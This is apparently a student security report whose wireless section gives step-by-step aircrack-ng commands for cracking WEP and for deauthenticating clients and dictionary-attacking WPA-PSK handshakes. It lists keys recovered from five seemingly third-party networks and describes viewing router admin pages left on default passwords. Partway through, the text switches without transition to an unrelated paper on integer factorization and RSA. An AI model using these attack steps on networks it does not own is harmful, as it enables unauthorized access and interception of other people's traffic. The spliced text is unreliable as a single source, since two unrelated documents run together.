In the previous section, we managed to probe for nearby wireless networks; the next step is to locate a WEP-secured network that can be used for breaking. In Figure 3.1, we can see that the ESSID "ruiqi", with BSSID 00:1A:70:95:6A:C6, uses WEP. We will use this network to recover the WEP key. To monitor and capture the traffic for 'ruiqi', the command "sudo airodump-ng -c 11 --bssid 00:1A:70:95:6A:C6 -w ruiqi mon0" is executed, where -c is the channel to listen on and -w names the file to be written. If no existing host is connected to the network, the data capture will be very slow (approx. 20,000 packets are required), and sometimes it is slow even when a host is connected (Figure 3 top left). The next step is to perform a fake authentication with the Access Point (AP): in order for the AP to accept packets, the source MAC address must be associated with it.
To associate with the access point, the command 'sudo aireplay-ng -1 6000 -o 1 -q 10 -e ruiqi -a 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0' is issued.¹ This packet is sent to the AP continuously to keep the association alive (Figure 3 top right). Although we managed to perform a fake authentication with the AP, packets were received from the AP very slowly. In order to speed things up, packet reinjection with 'aireplay-ng' is used: the command 'sudo aireplay-ng --arpreplay -x 50 -b 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0' is issued, and the number of data packets shoots up dramatically (Figure 3 bottom right). After a sufficient number of packets, in this case 20,006 packets, is received, the last step is to process these packets in order to recover the WEP key. The command 'aircrack-ng -b 00:1A:70:95:6A:C6 ruiqi-01.cap' is issued to start cracking, and the WEP key is found after processing the packets (Figure 3 bottom left). To verify that the key does work, it is used to decrypt the packets sent and received via the 'ruiqi' AP; in Figure 3.4, we can see the decrypted packet headers in plain text, including some packets sent from the owner's host to the AP. Other than the 'ruiqi' AP, we also tested other APs that use WEP, which are summarized in Table 1, with the individual APs shown in Figures 4 to 7. With all these WEP APs cracked, it is evident that WEP is not really secure, as it does not require much effort to crack: less than three hours to crack all five APs in our case. Table 2 shows the full, detailed steps of cracking an AP that uses WEP to secure its network.

¹ -1 means fake authentication, 6000 is the re-association timing in seconds, -o 1 means send only one set of packets at a time, -q 10 means send keep-alive packets every 10 seconds.
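For reference, the complete command sequence of this WEP session, collected verbatim from the steps above (the interface, ESSID, BSSID and MAC values are those of this particular test):

    airodump-ng mon0
    sudo airodump-ng -c 11 --bssid 00:1A:70:95:6A:C6 -w ruiqi mon0
    sudo aireplay-ng -1 6000 -o 1 -q 10 -e ruiqi -a 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0
    sudo aireplay-ng --arpreplay -x 50 -b 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0
    aircrack-ng -b 00:1A:70:95:6A:C6 ruiqi-01.cap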
Unfortunately, we were unable to crack the passphrase for the Remyidah network, but we also demonstrated the method on our own device, using a commonly used word as the passphrase, and retrieved it successfully, as shown in Figure 12. In conclusion, WPA-PSK and WPA2-PSK are vulnerable to brute-force attack if the keys used are commonly known English words or known passwords and are relatively short. Otherwise it is nearly impossible to break into WPA, because the attack becomes far more difficult against a long, random alphanumeric passphrase. The steps of our attempt to crack WPA-PSK and WPA2-PSK are detailed in Table 3.

2.4 Other vulnerabilities in the home environment (Research)

2.4.1 Administrator Access

Every router or modem has its own set of management functions for the network, such as MAC filtering and the network firewall. These functions can be accessed through the router's address, for example 192.168.0.1, by anyone who has administrator rights. By default, most of these devices use no protection at all, and even when they do, the user ID and password are often identical defaults, for example 'admin' for both. In the survey we conducted to better understand how individuals manage access to their home networks, almost 42% of respondents either did not secure their network or left the default settings in place. Moreover, Figures 13 and 14 display the administrator pages of the home networks whose WEP keys we cracked earlier. In Figure 13 there is no password protection, so the page can be accessed without any effort; Figure 14 does have password protection, but the default credentials are still in use, namely 'admin' for both username and password. For most home networks, then, individuals do not set or change the password on their device. Hence, if their keys are ever compromised, their device can also be taken over by the intruder, although the device can be reset if that happens.
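Checking one's own router for this problem can even be scripted. The following sketch is our own illustration, using Python's third-party requests library; the address, credential pairs, and the assumption that the router uses HTTP basic authentication are all ours (many consumer routers use form-based logins instead), and it should only be run against a device you own.

    import requests
    from requests.auth import HTTPBasicAuth

    # Hypothetical router address and common vendor-default credential pairs
    ROUTER = "http://192.168.0.1/"
    DEFAULTS = [("admin", "admin"), ("admin", "password"), ("admin", "")]

    def audit_defaults(url, pairs, timeout=3):
        # Report any default pair the admin page still accepts (HTTP 200)
        accepted = []
        for user, pwd in pairs:
            try:
                r = requests.get(url, auth=HTTPBasicAuth(user, pwd), timeout=timeout)
                if r.status_code == 200:
                    accepted.append((user, pwd))
            except requests.RequestException:
                pass  # router unreachable or connection refused
        return accepted

    print(audit_defaults(ROUTER, DEFAULTS))  # run only against your own device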
2.4.2 Firewall

By default, the firewall of a home modem blocks unwanted inbound activity from the Internet and acts as a first tier of defence for all the devices connected to the AP. Although such a firewall cannot inspect packets the way a software firewall can, its blocking prevents the home network from being flooded and can deter attacks such as denial of service. The firewalls of routers and modems are enabled by default, and this is sufficient protection for the network itself. Figure 15 shows the default firewall settings of one of the previously cracked home networks.

3 Security in Government Institutes

Government institutes store huge collections of secret and confidential information on employees' laptops and on central servers within the institutes. In addition, the transmission of top-secret and confidential documents in digital form is required for normal operations every day. Hence, a proper level of security must be maintained for these digital resources. In Singapore, the government has entrusted several companies with developing a wide spectrum of technologies and solutions to safeguard government institutes against potential security threats. For example, the Singapore government partnered with e-Cop, which developed the government's centrally administered desktop firewall (CAFE) and provides 24x7 network surveillance technology and services to detect attacks before they can cause any harm to IT systems [4].

Another example is the partnership with OPUS IT, which provides network forensics security solutions to various government agencies in Singapore. Its network-centric forensic technology acts as a 'silent' shadow-surveillance system, enabling detective work on security and policy breaches as well as fine-tuning of high-end network throughput. The systems developed by e-Cop and OPUS IT are employed in Mindef-related institutes.

To prevent intellectual property, trade secrets, and other confidential and proprietary business information from leaking out via recording devices, the Singapore government has banned camera phones and other recording devices in Mindef-related institutes and in agencies working on projects with confidential information. Severe punishment is handed to personnel who fail to comply with the policy. Similar policies are implemented in other countries' government agencies, for example in Japan, China and Malaysia. Malaysia barred all gadgets with camera facilities from being brought into high-security government premises; the ban is meant to prevent spying and the leaking of sensitive information or official secrets, which could jeopardize national security [5]. In addition, government bodies were instructed to look into installing electronic jamming devices in security zones to prevent unauthorized communication or transmission of data and images [5]. Such jamming devices work by combining hardware transmitters with a small piece of control software loaded into a camera-phone handset: whenever the phone enters an area covered by the jamming hardware, its camera is deactivated [6]. This prevents personnel from using the camera in areas secured with the jamming hardware.

3.1 Centrally Administered Desktop Firewall

The main intention of CAFE is to eliminate network-based attacks transmitted by thumb drives within the government. When a user connects to the government network, directly or remotely, from a government desktop, an updated set of desktop firewall policies is downloaded. Whenever a thumb drive is inserted into the desktop, CAFE scans through all the data on it. In the event that an infected computer is connected to the government network, CAFE prevents that computer from spreading threats to other computers on the network. CAFE is further enhanced by 24x7 round-the-clock surveillance, which provides comprehensive reporting, incident handling with prompt responses, and prevention of unauthorized access or intrusion [4]. Similar to Singapore, the USA also limits the use of thumb drives and all other removable devices on its networks, due to concerns that malicious programs may be transmitted through these media [7].

3.2 Case Study in DSO

While working at the Defense Science Organization (DSO) as an intern during the last vacation, one of the authors observed that it has very stringent security regulations for all employees and visitors entering the building. A likely reason is that the activities conducted in the company are highly confidential, as DSO is responsible for research into future warfare: its purpose is to develop technologies and solutions for the Singapore Armed Forces to sharpen the cutting edge of Singapore's national security. On entering the building, all visitors and employees are screened by security guards before they are cleared to enter. Devices with a camera function are not allowed to be brought into the building.
This ensures that no one can use such devices to capture important information and leak it to unauthorized parties. Furthermore, employees may only bring authorized laptops or equipment issued by DSO into the building. Compared to other companies, DSO performs much tighter security checks, trying to keep potentially harmful devices out of the company.

To access a department in the building, employees are required to scan their access card, and each card carries different access rights and permissions depending on the individual's job, rank and security clearance. An interesting point to note is that there is no wireless connectivity in the entire building: employees must access the Internet over a wired (Ethernet) connection. The intern's mentor at DSO highlighted that a wired connection is inherently more secure than a wireless one. Wireless traffic, by its technological nature, can be intercepted easily, as the data being sent and received is transmitted over the air. Wired connections can also be infiltrated, but the need for physical access to the wires in most cases makes them inherently much more secure [8]. The security of the wired connection is reinforced by the strict security checks at the entrance of the building and by the numerous surveillance cameras installed at various places to detect suspicious activities.

However, the Ethernet cabling used is Cat 5/6 twisted pair, which is not TEMPEST-shielded. This means the cable emits electromagnetic radiation (EMR) in a manner that can be used to reconstruct intelligible data: with the correct equipment and techniques, it is possible to reconstruct all or a substantial portion of that data [9]. The electromagnetic radiation can be picked up from a distance of around 200 to 300 metres. We do not have much information about what DSO does to protect against this susceptibility of Ethernet cables, but it may have employed several safeguards against TEMPEST attacks. First, unauthorized individuals do not have access to the building, so they have no means of getting close to the source of the emitted radiation. Secondly, the walls of a department may be constructed to block unintentional emissions from leaving that department. Other measures, such as filtering and shielding of the communication devices, can be applied for electromagnetic isolation [10]. As mentioned earlier, a wide spectrum of technologies is employed in government institutes; DSO also uses the centrally administered desktop firewall (CAFE) and the 24x7 network surveillance technology and service.

4 Security in Enterprises

In the office environment, employees handle different types of files every day, and certain files are accessible only to upper management. Different enterprises therefore have different rules and regulations in their security policies, and they may also employ different network settings and different wireless encryption. In this section we review the security environment of two firms, United Test and Assembly Center Ltd (UTAC) and English Corners, and compare their policies: one is a relatively large company, while the other is a small enterprise of fewer than ten employees.
4.1 Case Study in English Corners (Singapore Firm)

The first case we review is a small company named English Corners, which sells its own books and educational toys to primary-school children and their parents. In this section we look at the policies and security measures of this small enterprise.

The office has an open concept, which means that customers can simply walk into the company to purchase items, bringing them into contact with all the staff and computers. To protect the workstations from being viewed or used by others, they are protected with passwords, and employees are required to log in with their assigned user ID and password. There is also a rule that an employee must attend to customers before the customers get close to a workstation, and while attending to customers, employees are required to log off their workstation so that no one else can use it.

This small enterprise uses a wireless router for Internet access, and the password for the wireless network is supposed to be known only to senior management. There is a flaw here, however, because the computer with access to the router is not properly secured: interns are required to open the shop and start up the company systems every morning, so every intern assigned to starting up the systems comes to know the network password. In addition, because the company is a small enterprise, it has no IT support department; all the networking and the company website are handled by the boss's son. As a result, the network has only the bare minimum of protection, namely Wired Equivalent Privacy (WEP), whose weaknesses were discussed in Section 2 on the home environment. Compared with a home environment, an office environment has more users on the wireless network, where a home has only one or two; this makes the office users even more exposed over the wireless network.

English Corners also has weak file protection. Being a small company, it has no intranet for passing files around, so all file transfer is done through a thumb drive, which gives everyone in the office access to every kind of file on it. This total lack of security allowed even the interns to view many different files, e.g. the customer database spreadsheet, all customers' confidential credit card numbers, and many others. There is no file access control at all: any employee can easily read or modify the files on the thumb drive. In addition, there is no policy against using a personal thumb drive to copy documents out and finish the work at home.

In conclusion, the company at which one of our researchers worked has limited, low security, likely because it does not understand the importance of protecting its data and has no IT department to set up and enforce a set of rules. It should establish a policy against the use of external storage devices, set up an intranet for workers to share their documents, and define a file access policy specifying who may access which kinds of information.

4.2 Case Study in United Test and Assembly Center Ltd

The second case study is of a high-tech manufacturing firm, United Test and Assembly Center Ltd (UTAC), which produces chips such as the SIM cards used in mobile phones.
UTAC has reasonable security policies in place to protect the designs and technologies used in its manufacturing processes. To get past the reception area, employees have to scan their employee pass at a sensor in order to open a door, and within the building itself more scanning is needed to get where they need to go, because the building is divided into many areas. These generally fall under one of four functions: manufacturing, research and development (R&D), general administration, and management information systems (MIS), i.e. the IT department. Each area is separated by doors that require an employee to scan a pass, so UTAC controls which areas an employee can access through different levels of pass. This is similar to the scenario described in our DSO case study.

Visitors must exchange for a pass if they are staying for a long period (e.g. more than a day); otherwise they must be accompanied at all times by an employee, who brings them in and stays with them throughout their visit. Everyone who wants to exit the building has to go through a metal scanner under the watchful eyes of at least one security guard; this is to prevent the chips being manufactured from being taken out and leaked to competitors.

However, unlike DSO, UTAC does have a wireless network within the building, with WPA used as the form of encryption. The username and password for the wireless connection are not known to all employees; they are given out on a need-to-know basis. Moreover, the username used to access the network is linked to the employee's company profile, so their Internet rights are limited to what that profile grants (this point is discussed further below). Although thought has clearly been given to wireless security, UTAC also runs a second wireless network for visitors. This second network has no encryption, its username and password are given out freely, and there is no restriction at all on what users can do with it, so at first sight the wireless security of UTAC looks easily compromised. One cannot help but wonder, however, whether this network is deliberately set up this way to let visitors access the Internet easily, with security measures such as separating it from the company network in a demilitarized zone (DMZ) actually in place. What exactly has or has not been done about this second wireless network was not disclosed to us.

As mentioned earlier, each employee has an individual profile on the company network, which controls access to files and folders. Each department has a shared virtual drive for its work, and an individual's profile determines which files he has access to. Internet access is also based on this profile: most employees have no Internet access at all, some have limited access to a few websites, and only a few have full Internet access.

Desktop security is another aspect worth noting. UTAC has a centralized firewall, using Symantec software running on every PC in the building. The software is administered centrally on a server, and updates are pushed to the PCs every night. In addition, the Symantec software is also used to block the use of thumb drives and other storage devices on the PCs.
Lastly, UTAC has a policy that no thumb drives or other external storage devices may be carried into or out of UTAC premises. Exceptions can be made by request to the IT department; upon approval, a sticker is issued to be pasted on the approved device. Laptops are subject to the same policy. The policy is also upheld by the metal scanner that everyone must pass through to exit the building, and the security guard will also ask to look into the bags of everyone who exits.

4.3 Comparison of firms

From the two cases above we can see several differences in security policy. The first is that one firm's employees are allowed to use external storage devices while the other's are not. This stems from the difference in company structure and from the availability of an intranet at UTAC but not at English Corners: UTAC employees can transfer files within the organization over the intranet, whereas English Corners has to rely on thumb drives or email to transfer or share files. The point of banning external storage is to prevent employees from carrying information out of the company, so on this point UTAC clearly has a stronger security policy than English Corners for the protection of its data. In addition, English Corners allows all employees to access all files and to modify them, whereas at UTAC employees may only view documents at the level their profile allows.

5 Compare and Contrast of the Various Environments

From our research, we can see different levels of security policy deployed in the three environments, namely government, office and home. As reviewed, the government requires the most secure environment because of the nature of the data it holds and handles; the office and home environments are less secure, owing to their nature, the technical knowledge of the individuals involved, and the support available.

The government environment uses wired connections despite the availability of newer wireless technology, because that technology still contains vulnerabilities that can be exploited: a wired network prevents unauthorized personnel from intercepting packets in transit, which can be done easily in the case of a wireless connection. However, the wired connections used by Singapore government institutes emit electromagnetic radiation, so further preventive measures are taken against tapping of the cables, such as installing more surveillance cameras to look out for suspicious activities.

In general, both the office and the government environment post security guards on the premises to check employees and visitors and screen out suspicious or unauthorized items being brought into the area. Most companies, however, allow employees to bring in camera phones, with the exception of government agencies such as Mindef and DSO, where employees are prohibited from bringing camera phones and failure to comply is severely punished. For example, an intern at DSO caught with a camera phone may be dismissed, while an employee of a Mindef-related institute such as the SAF can face a court martial for bringing one in.
In contrast, in the home environment wireless networking is usually enabled, because most modems and routers come bundled with the network contract signed with the provider, and these devices usually have wireless capability turned on by default. Moreover, enabling wireless means more convenient Internet access anywhere in the home, and can serve more users. The security of individual home networks varies with the owners' technological knowledge, but many home users keep the default security settings to protect their wireless network. For older routers and modems the default security setting is WEP, which is flawed and already broken, so anyone can break into these home networks easily.

6 Limitations

We faced certain limitations during our research. One was the lack of information we could gather over the Internet about the government environment: the only information for our case study (DSO) was provided by one of our authors, who worked in that government institute as an intern. Even so, we remained quite restricted in what we could obtain from DSO, since the privileges and access permissions given to an intern are restricted to the project assigned to them. The information gathered from the intern may therefore be only the tip of the iceberg; there may be further security measures that we did not discover. In addition, interns are required to sign a non-disclosure agreement not to disclose confidential information about their project or about the structure and layout of the building they work in, which limits the scope of what we could write in this report.

Another limitation, in our research on the home environment, was that we had to be stationed near the targeted network to avoid packet loss, which would have hindered our sniffing for network vulnerabilities; we therefore needed multiple access points to be available in the vicinity for cracking. There is also a limitation to the dictionary attacks we performed when cracking the passwords: since we do not have a supercomputer that can generate candidate keys quickly, we were only able to crack passphrases that are commonly used English words or known passwords and relatively short.

7 Conclusion

From our research, the government has adopted the most comprehensive and restrictive policies, standards and procedures for maintaining a secure infrastructure for transmitting sensitive information. The security around government institutes is generally adequate, but some measures may seem too rigid, which can cause inconvenience and unhappiness among employees.

The office environment employs different standards of security policy in different firms, with some companies maintaining stricter policies than others. Wireless network security at an office such as English Corners, for example, is not adequate. Improvements are needed in several areas: more thorough policies and standards for wireless networking, stronger management and monitoring of wireless operating activities, and the use of WPA as the security key for wireless connections. We would also suggest using an intranet for file sharing, with file access levels to prevent unauthorized access to confidential files.
The default security key used in the home environment should be changed to WPA, to give individuals a more secure network in their homes. ISPs should step in and help their customers, either by guiding them in switching existing devices from WEP to WPA or by persuading them to upgrade to a newer router or modem. ISPs should also help their customers secure the administrator pages of these devices with a better protection mechanism, to further deter intrusion. This would let less IT-savvy users enjoy stronger protection on their home wireless networks.

References

1) Robert, J. B. (2002). Wireless Security: An Overview. Retrieved 30 October 2011, from http://www.washburn.edu/faculty/boncella/WIRELESS-SECURITY.pdf
2) Nikita, B., Ian, G., & David, W. (n.d.). Intercepting Mobile Communications: The Insecurity of 802.11. Retrieved 30 October 2011, from http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf
3) Aircrack-ng. Retrieved from http://www.aircrack-ng.org/
4) Infocomm Development Authority of Singapore. (2006). Singapore: A World Class eGovernment. Retrieved 30 October 2011, from http://www.ida.gov.sg/doc/Infocomm%20Industry/Infocomm_Industry_Level1/Gov%20Brochure.pdf
5) Lee, M. K. (2007, July 27). Malaysian Govt bans camera phones. Retrieved 30 October 2011, from http://www.zdnetasia.com/malaysian-govt-bans-camera-phones-62029540.htm
6) Munir, K. (2003, September 13). Jamming device aims at camera phones. Retrieved 30 October 2011, from http://www.zdnetasia.com/jamming-device-aims-at-camera-phones-39150860.htm
7) Bob, B. (2008, November 21). Defense bans use of removable storage devices. Retrieved 30 October 2011, from http://www.nextgov.com/nextgov/ng_20081121_2238.php
8) Joanne, R. (2008, May 15). Wired vs Wireless: Sometimes There's no Substitute for a Cable. Retrieved 30 October 2011, from http://www.osnews.com/story/19748/Wired_vs_Wireless_Sometimes_There_s_No_Substitute_for_a_Cable/page2/Asd
9) Borys, P. (2001, February). Tempest. Retrieved 30 October 2011, from http://searchsecurity.techtarget.com/definition/Tempest
10) U.S. Army Corps of Engineers, Publication Department. (1990, December 31). Electromagnetic Pulse (EMP) and Tempest Protection for Facilities. Retrieved 30 October 2011, from http://cryptome.org/emp08.htm

Appendix A

Table 1 – Found keys of WEP networks

BSSID              | ESSID        | Channel | Key found
00:1A:70:95:6A:C6  | ruiqi        | 11      | 18:06:19:81:88
00:C0:CA:1D:51:D4  | WLAN-11g-AP  | 1       | 64:69:76:65:72
00:1F:B3:63:46:89  | 2WIRE092     | 6       | 21:53:38:13:27
00:16:B6:33:9A:B0  | hairi        | 6       | 93:80:83:14:00
00:23:51:AB:40:71  | 2WIRE687     | 6       | 84:39:27:86:29

Table 2 – Detailed steps for cracking a WEP wireless network

Step | Function | Command
1 | Enable wifi monitor mode | sudo airmon-ng start wlan1
2 | Start network sniffing to select target AP | sudo airodump-ng mon0
3 | Monitor specific network | sudo airodump-ng -c <CHANNEL> --bssid <MAC ADDRESS> -w <FILE-NAME> mon0
4 | Fake authentication (optional, if no host is connected to the AP) | sudo aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <BSSID> -h <fake BSSID> --ignore-negative-one mon0
5 | ARP request replay attack | sudo aireplay-ng -3 -b <BSSID> -h <HOST / FAKE BSSID> --ignore-negative-one mon0
6 | Recover the WEP key from the collected IVs | sudo aircrack-ng -b 00:1A:70:95:6A:C6 ruiqi-01.cap
7 | Decrypt and view the whole network exchange with the AP | sudo airdecap-ng -w <passphrase key> <captured network file name, e.g. "2WIRE687-01.cap"> (decrypting); sudo tcpdump -r <decrypted network file name> -i mon0 (viewing)

Table 3 – Detailed steps for cracking a (WPA/WPA2)-PSK wireless network

Step | Function | Command
1 | Enable wifi monitor mode | sudo airmon-ng start wlan1
2 | Start network sniffing to select target AP | sudo airodump-ng mon0
3 | Collect the authentication 4-way handshake for the targeted AP | sudo airodump-ng -c 6 --bssid <BSSID> -w <file name to save> mon0
4 | Deauthenticate a client who is already connected to the AP | sudo aireplay-ng -0 500 -a <AP MAC ADDRESS> -c <Client MAC ADDRESS> --ignore-negative-one mon0
5 | Check whether the handshake has been captured | sudo aircrack-ng <file name>
6 | Dictionary attack on the captured handshake file | sudo aircrack-ng -w password.lst -b <AP MAC ADDRESS> <file name>

Appendix B

Figure 1 – List of available wireless networks (Location A)
Figure 2 – List of available wireless networks (Location B)
Figure 3 – Aircrack-ng on WEP for the ruiqi network
Figure 4 – Plain-text (decrypted) packets for the ruiqi network
Figure 5 – Aircrack-ng on WEP for the WLAN-11g-AP network
Figure 6 – Aircrack-ng on WEP for the 2WIRE092 network
Figure 7 – Aircrack-ng on WEP for the 2WIRE687 network
Figure 8 – Aircrack-ng on WEP for the hairi network
Figure 9 – Plain-text (decrypted) packets for the hairi network
Figure 10 – WPA-PSK 4-way handshake monitoring for the Remyidah network
Figure 11 – Dictionary attack on the obtained handshake for the Remyidah network
Figure 12 – WPA-PSK 4-way handshake and dictionary attack for the Linksys network
Figure 13 – Router homepage for the 2WIRE687 network
Figure 14 – Router homepage for the hairi network
Figure 15 – Router firewall for the hairi network

Appendix C

Figures 16 to 32 – Survey responses 1 to 17
Figures 33 to 37 – Survey results 1 to 5

Integer Factorization

Romain Edelmann [email protected], Jean Gauthier [email protected], and Fabien Schmitt [email protected]

École Polytechnique Fédérale de Lausanne

Abstract. In this report, we discuss the factorization of integers, a major problem closely related to cryptography and arithmetic, starting with a brief history of the subject and the mathematical background. We then discuss the motivation behind factorizing numbers, and analyze the problem within complexity theory in terms of feasibility and complexity.
Various algorithms are then presented, some of them implemented in Python.

Keywords. Integer factorization, prime factors, cryptography, public key systems, RSA, complexity theory, algorithm, Fermat's factorization method, Pollard's factorization method, Shor's algorithm.

1 Introduction

Integer factorization is the decomposition of a number into its prime divisors. As we shall see throughout this report, this problem is very important in a number of fields, including cryptography. It might seem easy to solve at first, but in fact it gets much harder as the numbers get big.

2 History

Integer factorization and prime numbers are closely related subjects and have been studied for a very long time. [1]

Already in Ancient Greece, Euclid studied prime numbers and demonstrated some of their fundamental laws, such as the infinitude of primes and the fundamental theorem of arithmetic. Prime numbers were also taught in Pythagoras's school, and Eratosthenes tried to find some of their principles. Later, in 1640, the French mathematician Pierre de Fermat developed his "little theorem", though without proving it; less than a hundred years later, Leibniz and Euler proved it. Euler also developed many functions and theorems in number theory, such as Euler's totient theorem, which is a generalization of Fermat's little theorem.

Finding prime numbers remained hard, but at the beginning of the 19th century Gauss found an asymptotic formula for the density of the prime numbers. Other mathematicians devised tests to decide whether an integer is prime, including Lucas, who created his test in 1876 and found the largest prime number discovered without a computer. His test was improved by Lehmer in 1930 and is still in use nowadays.

In the 1970s, with the expansion of networks, scientists finally found a practical application for prime numbers: public key cryptography. Until then, all encryption had been symmetric. In 1976, Diffie and Hellman invented the first public key encryption, followed by Ronald Rivest, Adi Shamir and Leonard Adleman, who in 1978 invented a new public key cryptosystem named after them: RSA. Based on the properties of prime numbers and on factorization, RSA is still widely used nowadays. [2]

3 Important Mathematical Properties

Before proceeding to the rest of the report, it is important to review some of the mathematical properties used in integer factorization. This section covers theorems and definitions that are used throughout this paper. Since the vast majority of the propositions below are well-known results from basic algebra and number theory that can be found in any good algebra or mathematics book [3][4], the proofs have not been included; the theorems are hence formulated as propositions.

Definition 1. If a and b are integers, a ≠ 0, then a divides b if there is an integer c such that a · c = b. This is written a|b. In this case, a is a factor of b and b a multiple of a. If a does not divide b, we write a ∤ b.

Definition 2. A positive integer n greater than 1 is called prime if the only positive factors of n are 1 and n.

Definition 3. If a positive integer greater than 1 is not prime, it is called composite.

Definition 4. The largest integer g such that g|m and g|n, where m and n are both nonzero, is called the greatest common divisor of m and n and is denoted gcd(m, n).

Definition 5. If a number m is such that gcd(m, n) = 1 for a given n, then m is said to be coprime, or relatively prime, to n.
Proposition 1 (Fundamental Theorem of Arithmetic). Every positive integer greater than 1 can be written as a prime or a product of primes in a unique way, up to the order of its factors.

Proposition 2. Let n be a composite integer. Then n has a prime divisor less than or equal to √n.

Definition 6. Two integers a and b are congruent modulo n if n|(a − b). Formally, this is written a ≡ b mod n. If a and b are not congruent modulo n, we write a ≢ b mod n.

Definition 7. An integer a^{-1} which satisfies the congruence relation a · a^{-1} ≡ 1 mod m is called the modular multiplicative inverse modulo m, or simply the inverse of a. a^{-1} exists if and only if gcd(a, m) = 1.

Proposition 3 (Bézout's identity). For all nonzero integers a and b, there exist two integers x and y such that:

    a · x + b · y = gcd(a, b).    (1)

Proposition 4 (Euclidean algorithm). After the following steps, r_{k+1} is gcd(a, b):

    r_0 := a, r_1 := b    (2)
    r_0 = q_0 · r_1 + r_2    (3)
    r_1 = q_1 · r_2 + r_3    (4)
    ...
    r_{k-1} = q_{k-1} · r_k + r_{k+1}    (5)
    r_k = q_k · r_{k+1}    (6)

Proposition 5 (Extended Euclidean Algorithm). The following substitutions solve Bézout's identity, using the quotients computed in Euclid's algorithm. Furthermore, x is the multiplicative inverse of a mod b:

    r_{k+1} = r_{k-1} − q_{k-1} · r_k    (7)
    r_{k+1} = r_{k-1} − q_{k-1} · (r_{k-2} − q_{k-2} · r_{k-1})    (8)
    r_{k+1} = −q_{k-1} · r_{k-2} + r_{k-1} · (1 + q_{k-1} · q_{k-2})    (9)
    ...
    r_{k+1} = x · a + y · b    (10)

At each step, the r with the highest index on the right-hand side of the equation is substituted using the equation r_i = r_{i-2} − q_{i-2} · r_{i-1}. The computation stops when r_{k+1} is expressed as a linear combination of a and b.

Definition 8 (Euler's Phi Function). The function ϕ(n), defined as the number of positive integers less than or equal to n that are coprime to n, is called the totient or Euler's phi function of n:

    ϕ(n) = n · ∏_{p|n} (1 − 1/p)    (11)

where the p are the prime factors of n.

Corollary 1. If p and q are primes, then ϕ(p · q) = (p − 1) · (q − 1).

Proposition 6 (Fermat's little theorem). If p is prime, then for any integer a we have a^p ≡ a mod p. Alternatively, if gcd(a, p) = 1, then a^{p-1} ≡ 1 mod p.

Proposition 7 (Euler's theorem). If n and a are coprime integers, then a^{ϕ(n)} ≡ 1 mod n. This theorem is a generalization of Fermat's little theorem.

Proposition 8. Every odd integer can be written as a difference of two perfect squares. Furthermore, if l · m is a factorization of n, then n = ((l + m)/2)^2 − ((l − m)/2)^2 is such a difference.
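Propositions 4 and 5 translate directly into code. The following sketch is our own illustration, in the same Python used for the algorithms later in this report; it computes gcd(a, b), the Bézout coefficients, and the modular inverse of Definition 7:

    def extended_gcd(a, b):
        # Returns (g, x, y) with a*x + b*y = g = gcd(a, b)  (Propositions 3-5)
        if b == 0:
            return (a, 1, 0)
        g, x, y = extended_gcd(b, a % b)
        # From b*x + (a mod b)*y = g and a mod b = a - (a // b) * b
        return (g, y, x - (a // b) * y)

    def mod_inverse(a, m):
        # Inverse of a modulo m (Definition 7); exists iff gcd(a, m) = 1
        g, x, _ = extended_gcd(a % m, m)
        if g != 1:
            raise ValueError("a is not invertible modulo m")
        return x % m

    print(extended_gcd(240, 46))   # (2, -9, 47): 240*(-9) + 46*47 = 2
    print(mod_inverse(17, 3120))   # 2753, since 17 * 2753 = 46801 = 15*3120 + 1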
4 Motivation

Prime factorization is widely used in the scientific world: in cryptography, of course, but also in algorithmics and in image processing. Every number has a unique prime factorization, and knowing the prime factors of two or more numbers makes it quick to find their greatest common divisor, least common multiple or square root. Because of these properties, much research is still in progress to find prime factorizations faster. [5]

4.1 Cryptography

Factorization of Large Integers. Given two big prime numbers, it is really easy to obtain their product; but from this product, it is practically impossible to recover the prime factorization [6]. This problem is the basis of today's public key cryptography [7], widely used in network security.

Public Key Cryptography. The main principle of public key cryptography is to create a function that is easy to compute but hard to invert. Anyone who wants to send you a secret message can encrypt it with your public key, which is accessible to everyone on the network; but without the private key, which remains secret to everyone but you, it is almost impossible to decrypt the message. [7]

The Example of RSA (Rivest, Shamir, Adleman). One of the most widely used systems on the Internet is the RSA cryptosystem [7]. This public key cryptosystem is based on the difficulty of finding the two prime factors of a huge number. Let us take the case of Bob, who wants to send a message to Alice without anyone but Alice being able to read it. First of all, let us see how Alice creates her public and private keys.

– Alice chooses two big prime numbers, p and q, which she keeps private. She then computes their product n = p · q.
– Alice computes Euler's phi function of n:

    ϕ(n) = (p − 1) · (q − 1)    (12)

A key thing to understand is that Alice can calculate this function very easily because, contrary to anybody else, she knows p and q, the prime factors of n.
– Alice then chooses a number e relatively prime to ϕ(n) and calculates its inverse d modulo ϕ(n):

    d ≡ e^{-1} mod ϕ(n)    (13)

To compute d, Alice can use the Extended Euclidean Algorithm.
– Alice now publishes the pair (n, e) as her public key and keeps d secret.

If Bob wants to send a confidential message M to Alice, he uses Alice's public key to perform the computation

    E ≡ M^e mod n    (14)

and then sends the computed ciphertext E to Alice. When she receives the ciphertext, Alice can retrieve the original message by computing

    M ≡ E^d mod n    (15)

The fact that M is recovered by this computation follows from Euler's theorem.
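To make the scheme concrete, here is a toy run of RSA in Python with textbook-sized primes (the values p = 61, q = 53, e = 17 are a standard illustrative choice, far too small for real security; pow(e, -1, phi) requires Python 3.8+):

    p, q = 61, 53
    n = p * q                  # 3233, published
    phi = (p - 1) * (q - 1)    # 3120, known only to Alice
    e = 17                     # public exponent, coprime to phi
    d = pow(e, -1, phi)        # 2753, private key: inverse of e mod phi

    M = 65                     # Bob's message, encoded as a number < n
    E = pow(M, e, n)           # encryption with the public key (n, e)
    assert pow(E, d, n) == M   # decryption with d recovers M (Euler's theorem)
    print(n, d, E)             # 3233 2753 2790

Anyone who could factor n = 3233 into 61 · 53 would recompute phi and d exactly as above, which is precisely the attack described next.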
